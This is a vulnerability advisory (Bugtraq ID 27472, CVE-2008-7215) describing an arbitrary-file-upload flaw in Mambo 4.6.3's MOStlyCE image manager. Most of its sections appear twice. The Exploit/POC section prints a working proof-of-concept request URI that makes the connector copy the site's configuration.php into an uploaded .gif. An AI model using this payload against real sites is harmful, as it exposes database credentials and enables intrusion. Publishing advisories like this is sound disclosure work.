Mambo MOStlyCE Module Image Manager Utility Arbitrary File Upload Vulnerability
BID:27472
Info
Mambo MOStlyCE Module Image Manager Utility Arbitrary File Upload Vulnerability
| Bugtraq ID: | 27472 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-7215 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 28 2008 12:00AM |
| Updated: | May 07 2015 05:33PM |
| Credit: | AmnPardaz Security Research Team discovered this issue. |
| Vulnerable: |
Mambo MOStlyCE 2.4 Mambo Mambo Open Source 4.6.3 |
| Not Vulnerable: | |
Discussion
Mambo MOStlyCE Module Image Manager Utility Arbitrary File Upload Vulnerability
The MOStlyCE module for Mambo is prone to an arbitrary-file-upload vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting this issue could allow an attacker to upload and execute arbitrary script code in the context of the affected webserver process.
MOStlyCE 2.4 included with Mambo 4.6.3 is vulnerable; other versions may also be affected.
The MOStlyCE module for Mambo is prone to an arbitrary-file-upload vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting this issue could allow an attacker to upload and execute arbitrary script code in the context of the affected webserver process.
MOStlyCE 2.4 included with Mambo 4.6.3 is vulnerable; other versions may also be affected.
Exploit / POC
Mambo MOStlyCE Module Image Manager Utility Arbitrary File Upload Vulnerability
Attackers may exploit this issue through a browser.
The following proof-of-concept URI is available:
http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload&file=a&file[NewFile][name]=abc.gif&file[NewFile][tmp_name]=C:/path/to/MamboV4.6.2/configuration.php&file[NewFile][size]=1&CurrentFolder=
Attackers may exploit this issue through a browser.
The following proof-of-concept URI is available:
http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload&file=a&file[NewFile][name]=abc.gif&file[NewFile][tmp_name]=C:/path/to/MamboV4.6.2/configuration.php&file[NewFile][size]=1&CurrentFolder=
Solution / Fix
Mambo MOStlyCE Module Image Manager Utility Arbitrary File Upload Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Mambo MOStlyCE Module Image Manager Utility Arbitrary File Upload Vulnerability
References:
References:
- Mambo Homepage (Mambo)
- Mambo 4.6.3 arbitrary file upload (Pawel Laskarzewski
) - Mambo 4.6.3 Path Disclosure, XSS , XSRF, DOS ([email protected])